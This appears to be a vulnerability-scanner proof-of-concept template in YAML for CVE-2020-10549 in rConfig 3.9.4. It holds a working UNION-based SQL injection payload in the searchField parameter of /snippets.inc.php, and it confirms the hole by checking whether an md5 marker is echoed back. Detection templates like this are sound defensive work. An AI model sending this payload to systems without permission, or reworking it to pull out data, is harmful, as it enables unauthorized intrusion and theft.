name: poc-yaml-rconfig-cve-2020-10549
binding: d86d20f3-33ae-4ce8-846c-47d6ddcdc673
manual: true
detail:
    author: 2husky
    links:
        - https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/
    vulnerability:
        id: CT-103058
        level: critical
transport: http
set:
    f1: randomLowercase(5)
rules:
    r0:
        request:
            cache: true
            method: GET
            path: /snippets.inc.php?search=True&searchField=antani'+union+select+md5('{{f1}}'),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains
            follow_redirects: false
        expression: response.status == 200 && response.body.bcontains(bytes(md5(f1)))
expression: r0()
